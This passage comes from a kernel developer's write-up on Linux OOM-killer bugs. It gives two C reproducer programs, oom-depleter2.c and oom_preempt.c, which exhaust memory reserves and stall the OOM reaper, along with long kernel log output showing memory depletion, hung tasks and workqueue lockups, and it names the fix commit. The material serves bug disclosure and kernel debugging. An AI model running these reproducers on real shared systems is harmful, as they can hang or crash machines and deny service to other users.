[  157.324279] workqueue events_freezable: flags=0x4
[  157.325652]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[  157.327373]     pending: vmballoon_work [vmw_balloon]
[  157.328859] workqueue events_power_efficient: flags=0x80
[  157.330343]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[  157.332067]     pending: neigh_periodic_work
[  157.333431] workqueue events_freezable_power_: flags=0x84
[  157.334941]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[  157.336684]     in-flight: 228:disk_events_workfn
[  157.338168] workqueue xfs-log/sda1: flags=0x14
[  157.339473]   pwq 7: cpus=3 node=0 flags=0x0 nice=-20 active=2/256
[  157.341255]     in-flight: 1369:xfs_log_worker
[  157.342674]     pending: xfs_buf_ioend_work
[  157.344066] pool 2: cpus=1 node=0 flags=0x0 nice=0 workers=3 idle: 43 14
[  157.346039] pool 7: cpus=3 node=0 flags=0x0 nice=-20 workers=2 manager: 27
[  185.044658] sysrq: SysRq : Show Memory
[  185.045975] Mem-Info:
[  185.046968] active_anon:423788 inactive_anon:2085 isolated_anon:0
[  185.046968]  active_file:0 inactive_file:1 isolated_file:0
[  185.046968]  unevictable:0 dirty:0 writeback:0 unstable:0
[  185.046968]  slab_reclaimable:1689 slab_unreclaimable:5401
[  185.046968]  mapped:391 shmem:2146 pagetables:2123 bounce:0
[  185.046968]  free:4 free_pcp:0 free_cma:0
[  185.056165] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes
[  185.066444] lowmem_reserve[]: 0 1731 1731 1731
[  185.068083] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  185.079186] lowmem_reserve[]: 0 0 0 0
[  185.080783] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[  185.083790] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB
[  185.087232] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  185.089572] 2147 total pagecache pages
[  185.091096] 0 pages in swap cache
[  185.092469] Swap cache stats: add 0, delete 0, find 0/0
[  185.094288] Free swap  = 0kB
[  185.095671] Total swap = 0kB
[  185.097075] 524157 pages RAM
[  185.098466] 0 pages HighMem/MovableOnly
[  185.100005] 76583 pages reserved
[  185.101435] 0 pages hwpoisoned
[  205.509157] sysrq: SysRq : Resetting
---------- Example output end ----------

Then, I was able to deplete memory reserves using the time window. Then, I got a comment that "What about sending SIGKILL immediately after setting TIF_MEMDIE flag?", and I again demonstrated that the result is same, using a different approach.

---------- oom-depleter2.c start ----------
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/klog.h>

static int zero_fd = -1;
static char *buf = NULL;
static unsigned long size = 0;

static int trigger(void *unused)
{
        {
                struct sched_param sp = { };
                sched_setscheduler(0, SCHED_IDLE, &sp);
        }
        read(zero_fd, buf, size); /* Will cause OOM due to overcommit */
        return 0;
}

int main(int argc, char *argv[])
{
        unsigned long i;
        zero_fd = open("/dev/zero", O_RDONLY);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        /* Let a child thread trigger the OOM killer. */
        clone(trigger, malloc(4096) + 4096, CLONE_SIGHAND | CLONE_VM, NULL);
        {
                struct sched_param sp = { 99 };
                sched_setscheduler(0, SCHED_FIFO, &sp);
        }
        /* Wait until the OOM killer messages appear. */
        while (1) {
                i = klogctl(2, buf, size - 1);
                if (i > 0) {
                        buf[i] = '\0';
                        if (strstr(buf, "Killed process "))
                                break;
                }
        }
        /* Deplete all memory reserve. */
        for (i = size; i; i -= 4096)
                buf[i - 1] = 1;
        return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter2.c start ----------

# taskset -c 0 ./oom-depleter2

---------- Example output start ----------
[   47.069197] oom-depleter2 invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   47.070651] oom-depleter2 cpuset=/ mems_allowed=0
[   47.072982] CPU: 0 PID: 3851 Comm: oom-depleter2 Tainted: G        W       4.2.0-rc7-next-20150824+ #85
[   47.074683] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   47.076583]  0000000000000000 00000000115c5c6c ffff88007ca2f8c8 ffffffff81313283
[   47.078014]  ffff88007890f2c0 ffff88007ca2f970 ffffffff8117ff7d 0000000000000000
[   47.079438]  0000000000000202 0000000000000018 0000000000000001 0000000000000202
[   47.080856] Call Trace:
[   47.081335]  [<ffffffff81313283>] dump_stack+0x4b/0x78
[   47.082233]  [<ffffffff8117ff7d>] dump_header+0x82/0x232
[   47.083234]  [<ffffffff81627645>] ? _raw_spin_unlock_irqrestore+0x25/0x30
[   47.084447]  [<ffffffff810fe041>] ? delayacct_end+0x51/0x60
[   47.085483]  [<ffffffff81114fd2>] oom_kill_process+0x372/0x3c0
[   47.086551]  [<ffffffff81071cd0>] ? has_ns_capability_noaudit+0x30/0x40
[   47.087715]  [<ffffffff81071cf2>] ? has_capability_noaudit+0x12/0x20
[   47.088874]  [<ffffffff8111528d>] out_of_memory+0x21d/0x4a0
[   47.089915]  [<ffffffff8111a774>] __alloc_pages_nodemask+0x904/0x930
[   47.091010]  [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0
[   47.092042]  [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950
[   47.093076]  [<ffffffff816287cd>] ? retint_kernel+0x1b/0x1d
[   47.094108]  [<ffffffff81628837>] ? native_iret+0x7/0x7
[   47.095108]  [<ffffffff810565bb>] __do_page_fault+0x18b/0x440
[   47.096109]  [<ffffffff810568a0>] do_page_fault+0x30/0x80
[   47.097052]  [<ffffffff816297e8>] page_fault+0x28/0x30
[   47.098544]  [<ffffffff81320ae0>] ? __clear_user+0x20/0x50
[   47.099651]  [<ffffffff813254b8>] iov_iter_zero+0x68/0x250
[   47.100642]  [<ffffffff810920f6>] ? sched_clock_cpu+0x86/0xc0
[   47.101701]  [<ffffffff813f9018>] read_iter_zero+0x38/0xa0
[   47.102754]  [<ffffffff81183ec4>] __vfs_read+0xc4/0xf0
[   47.103684]  [<ffffffff81184639>] vfs_read+0x79/0x120
[   47.104630]  [<ffffffff81185350>] SyS_read+0x50/0xc0
[   47.105503]  [<ffffffff8108bd9c>] ? do_sched_setscheduler+0x7c/0xb0
[   47.106637]  [<ffffffff81627cae>] entry_SYSCALL_64_fastpath+0x12/0x71
[   47.109307] Mem-Info:
[   47.109801] active_anon:416244 inactive_anon:3737 isolated_anon:0
[   47.109801]  active_file:0 inactive_file:474 isolated_file:0
[   47.109801]  unevictable:0 dirty:0 writeback:0 unstable:0
[   47.109801]  slab_reclaimable:1114 slab_unreclaimable:3896
[   47.109801]  mapped:96 shmem:4188 pagetables:1014 bounce:0
[   47.109801]  free:12368 free_pcp:183 free_cma:0
[   47.118364] Node 0 DMA free:7316kB min:400kB low:500kB high:600kB active_anon:7056kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes
[   47.129538] lowmem_reserve[]: 0 1731 1731 1731
[   47.131230] Node 0 DMA32 free:44016kB min:44652kB low:55812kB high:66976kB active_anon:1657920kB inactive_anon:14716kB active_file:0kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:796kB local_pcp:56kB free_cma:0kB writeback_tmp:0kB pages_scanned:124 all_unreclaimable? no
[   47.143246] lowmem_reserve[]: 0 0 0 0
[   47.145175] Node 0 DMA: 17*4kB (UE) 9*8kB (UE) 9*16kB (UEM) 1*32kB (M) 1*64kB (M) 2*128kB (UE) 2*256kB (EM) 2*512kB (EM) 1*1024kB (E) 2*2048kB (EM) 0*4096kB = 7292kB
[   47.152896] Node 0 DMA32: 1009*4kB (UEM) 617*8kB (UEM) 268*16kB (UEM) 118*32kB (UEM) 43*64kB (UEM) 13*128kB (UEM) 11*256kB (UEM) 10*512kB (UM) 12*1024kB (UM) 1*2048kB (U) 0*4096kB = 43724kB
[   47.161214] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   47.163987] 4649 total pagecache pages
[   47.166121] 0 pages in swap cache
[   47.168500] Swap cache stats: add 0, delete 0, find 0/0
[   47.170238] Free swap  = 0kB
[   47.171764] Total swap = 0kB
[   47.173270] 524157 pages RAM
[   47.174520] 0 pages HighMem/MovableOnly
[   47.175930] 76617 pages reserved
[   47.178043] 0 pages hwpoisoned
[   47.179584] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
[   47.182065] [ 3820]     0  3820    10756      168      24       3        0             0 systemd-journal
[   47.184504] [ 3823]     0  3823    10262      101      23       3        0         -1000 systemd-udevd
[   47.186847] [ 3824]     0  3824    27503       33      12       3        0             0 agetty
[   47.189291] [ 3825]     0  3825     8673       84      23       3        0             0 systemd-logind
[   47.191691] [ 3826]     0  3826    21787      154      48       3        0             0 login
[   47.193959] [ 3828]    81  3828     6609       82      18       3        0          -900 dbus-daemon
[   47.196297] [ 3831]     0  3831    28878       93      15       3        0             0 bash
[   47.198573] [ 3850]     0  3850   541715   414661     820       6        0             0 oom-depleter2
[   47.200915] [ 3851]     0  3851   541715   414661     820       6        0             0 oom-depleter2
[   47.203410] Out of memory: Kill process 3850 (oom-depleter2) score 900 or sacrifice child
[   47.205695] Killed process 3850 (oom-depleter2) total-vm:2166860kB, anon-rss:1658644kB, file-rss:0kB
[   47.257871] oom-depleter2: page allocation failure: order:0, mode:0x280da
[   47.260006] CPU: 0 PID: 3850 Comm: oom-depleter2 Tainted: G        W       4.2.0-rc7-next-20150824+ #85
[   47.262473] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   47.265184]  0000000000000000 000000000f39672f ffff880036febbe0 ffffffff81313283
[   47.267511]  00000000000280da ffff880036febc70 ffffffff81116e04 0000000000000000
[   47.269815]  ffffffff00000000 ffff88007fc19730 ffff880000000004 ffffffff810a30cf
[   47.272019] Call Trace:
[   47.273283]  [<ffffffff81313283>] dump_stack+0x4b/0x78
[   47.275081]  [<ffffffff81116e04>] warn_alloc_failed+0xf4/0x150
[   47.276962]  [<ffffffff810a30cf>] ? __wake_up+0x3f/0x50
[   47.278700]  [<ffffffff8111a0bc>] __alloc_pages_nodemask+0x24c/0x930
[   47.280664]  [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0
[   47.282422]  [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950
[   47.284240]  [<ffffffff810565bb>] __do_page_fault+0x18b/0x440
[   47.286036]  [<ffffffff810568a0>] do_page_fault+0x30/0x80
[   47.287693]  [<ffffffff816297e8>] page_fault+0x28/0x30
[   47.289358] Mem-Info:
[   47.290494] active_anon:429031 inactive_anon:3737 isolated_anon:0
[   47.290494]  active_file:0 inactive_file:0 isolated_file:0
[   47.290494]  unevictable:0 dirty:0 writeback:0 unstable:0
[   47.290494]  slab_reclaimable:1114 slab_unreclaimable:3896
[   47.290494]  mapped:96 shmem:4188 pagetables:1014 bounce:0
[   47.290494]  free:0 free_pcp:180 free_cma:0
[   47.299662] Node 0 DMA free:8kB min:400kB low:500kB high:600kB active_anon:14308kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes
[   47.309430] lowmem_reserve[]: 0 1731 1731 1731
[   47.311000] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1701816kB inactive_anon:14716kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:720kB local_pcp:24kB free_cma:0kB writeback_tmp:0kB pages_scanned:5584 all_unreclaimable? yes
[   47.321601] lowmem_reserve[]: 0 0 0 0
[   47.323166] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   47.326070] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   47.329018] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   47.331385] 4189 total pagecache pages
[   47.332896] 0 pages in swap cache
[   47.334262] Swap cache stats: add 0, delete 0, find 0/0
[   47.335990] Free swap  = 0kB
[   47.337390] Total swap = 0kB
[   47.338656] 524157 pages RAM
[   47.339964] 0 pages HighMem/MovableOnly
[   47.341464] 76617 pages reserved
[   47.342808] 0 pages hwpoisoned
(...snipped...)
[   93.082032] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   93.082034] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
---------- Example output end ----------

oom-depleter2 is a reproducer which exceptionally requires privileges, in order to read kernel messages with real time priority. But since nothing but strictly controlling the timing will require privileges, it would be possible to reproduce using unprivileged user's process if the timing matches.

After all, since it turned out that it is safe to send SIGKILL signal between task_lock() and task_unlock(), this bug was fixed by commit 426fb5e72d92b868 ("mm/oom_kill.c: reverse the order of setting TIF_MEMDIE and sending SIGKILL").

September 2015  Preemption defers the OOM killer so much

When asynchronous memory reclaim by kswapd cannot catch up, memory is synchronously reclaimed using direct reclaim. Therefore, when a lot of processes started memory allocation requests at the same time, they all will do direct reclaim. As a result, especially with kernels built with CONFIG_PREEMPT=y in order to improve response delay, the OOM killer cannot complete processing the operation within realistic duration when the OOM killer is invoked. And, this bug still remains even after the OOM reaper was introduced.

---------- oom_preempt.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>

static cpu_set_t set = { { 1 } }; /* Allow only CPU 0. */
static char filename[32] = { };

/* down_read(&mm->mmap_sem) requester. */
static int reader(void *unused)
{
        const int fd = open(filename, O_RDONLY);
        char buffer[128];
        sched_setaffinity(0, sizeof(set), &set);
        sleep(2);
        while (pread(fd, buffer, sizeof(buffer), 0) > 0);
        while (1)
                pause();
        return 0;
}

/* down_write(&mm->mmap_sem) requester. */
static int writer(void *unused)
{
        const int fd = open("/proc/self/exe", O_RDONLY);
        sleep(2);
        while (1) {
                void *ptr = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
                munmap(ptr, 4096);
        }
        return 0;
}

static void my_clone(int (*func) (void *))
{
        char *stack = malloc(4096);
        if (stack)
                clone(func, stack + 4096,
                      CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL);
}

/* Memory consumer for invoking the OOM killer. */
static void memory_eater(void) {
        char *buf = NULL;
        unsigned long i;
        unsigned long size = 0;
        sleep(4);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        fprintf(stderr, "Start eating memory\n");
        for (i = 0; i < size; i += 4096)
                buf[i] = '\0'; /* Will cause OOM due to overcommit */
}

int main(int argc, char *argv[])
{
        int i;
        const pid_t pid = fork();
        if (pid == 0) {
                for (i = 0; i < 9; i++)
                        my_clone(writer);
                writer(NULL);
                _exit(0);
        } else if (pid > 0) {
                snprintf(filename, sizeof(filename), "/proc/%u/stat", pid);
                for (i = 0; i < 100000; i++)
                        my_clone(reader);
        }
        memory_eater();
        return *(char *) NULL; /* Not reached. */
}
---------- oom_preempt.c ----------
---------- Example output start ----------
[   54.702339] oom_preempt invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0
[   54.705590] oom_preempt cpuset=/ mems_allowed=0
[   74.525856] CPU: 0 PID: 4436 Comm: oom_preempt Not tainted 4.7.0-rc5 #57
[   74.528056] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   74.530951]  0000000000000286 00000000a8634c59 ffff88007a8ab9f8 ffffffff812c32a7
[   74.533292]  ffff88007a8abbe0 0000000000000000 ffff88007a8aba90 ffffffff81188781
[   74.535723]  ffffffff810fde71 0000000000000001 0000000000000003 ffff88007fffdb10
[   74.538167] Call Trace:
[   74.539653]  [<ffffffff812c32a7>] dump_stack+0x4f/0x68
[   74.541537]  [<ffffffff81188781>] dump_header+0x5b/0x200
[   74.543392]  [<ffffffff810fde71>] ? delayacct_end+0x51/0x60
[   74.545329]  [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0
[   74.547618]  [<ffffffff815dce13>] ? _raw_spin_unlock_irqrestore+0x13/0x30
[   74.549894]  [<ffffffff811187d1>] oom_kill_process+0x221/0x420
[   74.551888]  [<ffffffff81117e1b>] ? find_lock_task_mm+0x4b/0x80
[   74.553936]  [<ffffffff81118cad>] out_of_memory+0x28d/0x480
[   74.556059]  [<ffffffff8111d20a>] __alloc_pages_nodemask+0xa5a/0xc20
[   74.558245]  [<ffffffff811143ff>] ? __page_cache_alloc+0xaf/0xc0
[   74.560278]  [<ffffffff81162563>] alloc_pages_current+0x83/0x110
[   74.562319]  [<ffffffff811143ff>] __page_cache_alloc+0xaf/0xc0
[   74.564328]  [<ffffffff81116fda>] filemap_fault+0x27a/0x500
[   74.566237]  [<ffffffff81246859>] xfs_filemap_fault+0x39/0x60
[   74.568308]  [<ffffffff8113d58e>] __do_fault+0x6e/0xf0
[   74.570182]  [<ffffffff8114236c>] handle_mm_fault+0x163c/0x2280
[   74.572131]  [<ffffffff815d8fc9>] ? __schedule+0x1c9/0x590
[   74.574015]  [<ffffffff810497bd>] __do_page_fault+0x19d/0x510
[   74.575898]  [<ffffffff81049b51>] do_page_fault+0x21/0x70
[   74.577656]  [<ffffffff8100259d>] ? do_syscall_64+0xed/0xf0
[   74.579503]  [<ffffffff815de9b2>] page_fault+0x22/0x30
[  240.447847] INFO: task oom_reaper:47 blocked for more than 120 seconds.
[  240.450075]       Not tainted 4.7.0-rc5 #57
[  240.451571] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[  240.453723] oom_reaper      D ffff88007cdb3ce8     0    47      2 0x00000000
[  240.455892]  ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824
[  240.458302]  ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00
[  240.460546]  ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783
[  240.462840] Call Trace:
[  240.463963]  [<ffffffff815d93ca>] schedule+0x3a/0x90
[  240.465586]  [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20
[  240.467430]  [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150
[  240.469236]  [<ffffffff815db3a2>] mutex_lock+0x12/0x22
[  240.470843]  [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0
[  240.472730]  [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220
[  240.476670]  [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0
[  240.478486]  [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40
[  240.480660]  [<ffffffff811183f6>] oom_reaper+0x86/0x170
[  240.482313]  [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0
[  240.484137]  [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50
[  240.485837]  [<ffffffff8107b5e3>] kthread+0xd3/0xf0
[  240.487417]  [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40
[  240.489090]  [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0
[  299.096125] Mem-Info:
[  299.097266] active_anon:392824 inactive_anon:2094 isolated_anon:0
[  299.097266]  active_file:0 inactive_file:0 isolated_file:0
[  299.097266]  unevictable:0 dirty:0 writeback:0 unstable:0
[  299.097266]  slab_reclaimable:1744 slab_unreclaimable:10750
[  299.097266]  mapped:369 shmem:2160 pagetables:2098 bounce:0
[  299.097266]  free:12955 free_pcp:159 free_cma:0
[  341.098578] Node 0 DMA free:7260kB min:404kB low:504kB high:604kB active_anon:6708kB inactive_anon:108kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:108kB slab_reclaimable:20kB slab_unreclaimable:408kB kernel_stack:688kB pagetables:432kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:20 all_unreclaimable? yes
[  360.494674] INFO: task oom_reaper:47 blocked for more than 120 seconds.
[  360.494675]       Not tainted 4.7.0-rc5 #57
[  360.494676] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[  360.494678] oom_reaper      D ffff88007cdb3ce8     0    47      2 0x00000000
[  360.494680]  ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824
[  360.494681]  ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00
[  360.494682]  ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783
[  360.494683] Call Trace:
[  360.494689]  [<ffffffff815d93ca>] schedule+0x3a/0x90
[  360.494690]  [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20
[  360.494691]  [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150
[  360.494693]  [<ffffffff815db3a2>] mutex_lock+0x12/0x22
[  360.494695]  [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0
[  360.494697]  [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220
[  360.494698]  [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0
[  360.494700]  [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40
[  360.494701]  [<ffffffff811183f6>] oom_reaper+0x86/0x170
[  360.494703]  [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0
[  360.494705]  [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50
[  360.494706]  [<ffffffff8107b5e3>] kthread+0xd3/0xf0
[  360.494708]  [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40
[  360.494709]  [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0
[  391.435178] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 86s!
[  391.435180] Showing busy workqueues and worker pools:
[  391.435181] workqueue events: flags=0x0
[  391.435186]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256
[  391.435196]     pending: vmpressure_work_fn, vmstat_shepherd
[  391.435200] workqueue events_freezable_power_: flags=0x84
[  391.435201]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[  391.435205]     in-flight: 30:disk_events_workfn
[  391.435226] workqueue xfs-eofblocks/sda1: flags=0xc
[  391.435227]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  391.435231]     in-flight: 72:xfs_eofblocks_worker
[  391.435234] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105
[  391.435236] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=86s workers=2 manager: 77
[  421.515615] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 116s!
[  421.515617] Showing busy workqueues and worker pools:
[  421.515618] workqueue events: flags=0x0
[  421.515620]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256
[  421.515627]     pending: vmpressure_work_fn, vmstat_shepherd
[  421.515631] workqueue events_power_efficient: flags=0x80
[  421.515633]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  421.515636]     pending: check_lifetime
[  421.515637] workqueue events_freezable_power_: flags=0x84
[  421.515638]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[  421.515641]     in-flight: 30:disk_events_workfn
[  421.515657] workqueue xfs-eofblocks/sda1: flags=0xc
[  421.515659]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  421.515662]     in-flight: 72:xfs_eofblocks_worker
[  421.515666] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105
[  421.515667] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=116s workers=2 manager: 77
[  451.596127] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 146s!
[  451.596129] Showing busy workqueues and worker pools:
[  451.596130] workqueue events: flags=0x0
[  451.596151]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256
[  451.596158]     pending: vmpressure_work_fn, vmstat_shepherd
[  451.596162] workqueue events_power_efficient: flags=0x80
[  451.596163]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  451.596166]     pending: check_lifetime
[  451.596167] workqueue events_freezable_power_: flags=0x84
[  451.596168]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[  451.596172]     in-flight: 30:disk_events_workfn
[  451.596187] workqueue xfs-eofblocks/sda1: flags=0xc
[  451.596188]   pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256
[  451.596191]     in-flight: 72:xfs_eofblocks_worker
[  451.596194] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105
[  451.596196] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=146s workers=2 manager: 77
[  480.496878] INFO: task oom_reaper:47 blocked for more than 120 seconds.
[  480.496879]       Not tainted 4.7.0-rc5 #57
[  480.496880] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[  480.496883] oom_reaper      D ffff88007cdb3ce8     0    47      2 0x00000000
[  480.496885]  ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824
[  480.496886]  ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00
[  480.496887]  ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783
[  480.496888] Call Trace:
[  480.496893]  [<ffffffff815d93ca>] schedule+0x3a/0x90
[  480.496895]  [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20
[  480.496896]  [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150
[  480.496897]  [<ffffffff815db3a2>] mutex_lock+0x12/0x22
[  480.496900]  [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0
[  480.496904]  [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220
[  480.496905]  [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0
[  480.496907]  [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40
[  480.496908]  [<ffffffff811183f6>] oom_reaper+0x86/0x170
[  480.496911]  [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0
[  480.496912]  [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50
[  480.496915]  [<ffffffff8107b5e3>] kthread+0xd3/0xf0
[  480.496917]  [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40
